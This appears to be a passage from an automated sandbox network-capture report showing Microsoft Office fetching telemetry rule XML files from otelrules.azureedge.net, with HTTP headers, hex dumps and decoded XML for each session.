                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      129192.168.2.45129113.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:10 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 478
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: d7b90bc6-301e-001f-5d18-2baa3a000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182010Z-15b8d89586fvk4kmbg8pf84y880000000ar000000000gw2a
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      130192.168.2.45129213.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:10 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 404
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: a783173c-501e-008c-2349-27cd39000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182010Z-16849878b78qf2gleqhwczd21s0000000a2000000000mrb1
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      131192.168.2.45129613.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:11 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 425
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: f296e79a-801e-008c-04d4-297130000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182011Z-17c5cb586f6f98jx9q4y7udcaw00000001a000000000pmvd
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      132192.168.2.45129813.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:11 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 448
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 51ccb76b-001e-0049-0a37-265bd5000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182011Z-16849878b78sx229w7g7at4nkg000000081000000000wa4z
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      133192.168.2.45129913.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:11 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 491
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 39d89106-201e-003f-20a3-266d94000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182011Z-16849878b7828dsgct3vrzta70000000089g00000000k32w
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      134192.168.2.45129713.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:11 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 475
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 7c52a88a-f01e-00aa-0993-2a8521000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182011Z-17c5cb586f6p5pndayxh2uxv5400000001d000000000qfb2
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      135192.168.2.45130013.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:11 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 416
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 6cea588d-401e-0015-2b7f-2a0e8d000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182011Z-17c5cb586f6fqqst87nqkbsx1c00000008dg000000009udv
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:11 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      136192.168.2.45130113.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:12 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 479
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 5926a802-601e-0032-207f-2aeebb000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182012Z-16849878b78km6fmmkbenhx76n000000095g00000000r78f
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      137192.168.2.45130313.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:12 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
